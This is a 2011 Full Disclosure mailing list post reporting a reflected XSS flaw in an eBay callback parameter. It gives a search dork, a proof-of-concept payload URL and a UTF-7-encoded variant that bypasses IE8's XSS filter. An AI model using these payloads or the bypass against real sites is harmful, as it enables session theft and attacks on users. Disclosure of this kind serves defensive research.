Full Disclosure mailing list archives
ebay.com callback xss vul
From: IEhrepus <5up3rh3i () gmail com>
Date: Fri, 11 Feb 2011 05:17:57 -0800
"site:ebay.com inurl:callback" on google.com and get this url: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=? then http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E ofcourse u can use 《xss attacks through utf7-BOM string injection<http://seclists.org/fulldisclosure/2011/Feb/199>》 to bypass ie8 xss filters http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=%2B%2Fv811..%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-xcsxxadas --superhei from http://www.80vul.com --ad-- About Ph4nt0m Webzine Ph4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions .mailto:root_at_ph4nt0m.org <root_at_ph4nt0m.org> pls.thank you!
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ebay.com callback xss vul IEhrepus (Feb 11)